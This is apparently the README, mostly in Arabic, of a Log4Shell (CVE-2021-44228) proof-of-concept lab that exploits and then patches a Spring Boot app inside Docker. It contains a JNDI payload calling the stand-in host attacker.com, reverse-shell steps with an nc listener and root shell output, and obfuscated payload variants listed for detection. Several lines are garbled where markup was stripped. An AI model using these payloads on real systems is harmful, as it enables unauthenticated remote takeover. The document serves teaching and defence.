
Log4Shell (CVE-2021-44228) PoC
إعادة إنتاج واستغلال ومعالجة ثغرة CVE حرجة معروفة في بيئة Docker معزولة.
يوضح إثبات المفهوم هذا CVE-2021-44228 (Log4Shell) في تطبيق Spring Boot.
CVE: 2021-44228
CVSS: 10.0 (حرجة)
المكوّن المتأثر: Apache Log4j (<= 2.14.1)
${...}) لحل القيم ديناميكيًا داخل رسائل السجل.${jndi:ldap://attacker.com:1389/a}.Exploit.class.Exploit.class عبر HTTP.Exploit، مما يؤدي إلى إنشاء قشرة عكسية عائدة إلى المهاجم.الأثر: تنفيذ عن بُعد بدون مصادقة - أعلى شدة ممكنة.
من/ما المعرض للخطر:
النتائج:
make build start
nc -l 4444
make exploit
/bin/sh: can't access tty; job control turned off
$ id
uid=0(root) gid=0(root) groups=0(root) ...
make patch
make build start
nc -l 4444
make exploit
# -> observe no reverse shell
${jndi:) عبر WAF أو وسيط (middleware).-Dlog4j2.formatMsgNoLookups=true
-Dcom.sun.jndi.ldap.object.trustURLCodebase=false
gradle dependencies, Snyk, Wiz، إلخ).log4j-core-*.jar، بما في ذلك ملفات JAR الكاملة (fat JARs).${jndi:...}, ${${lower:j}ndi:...}, إلخ).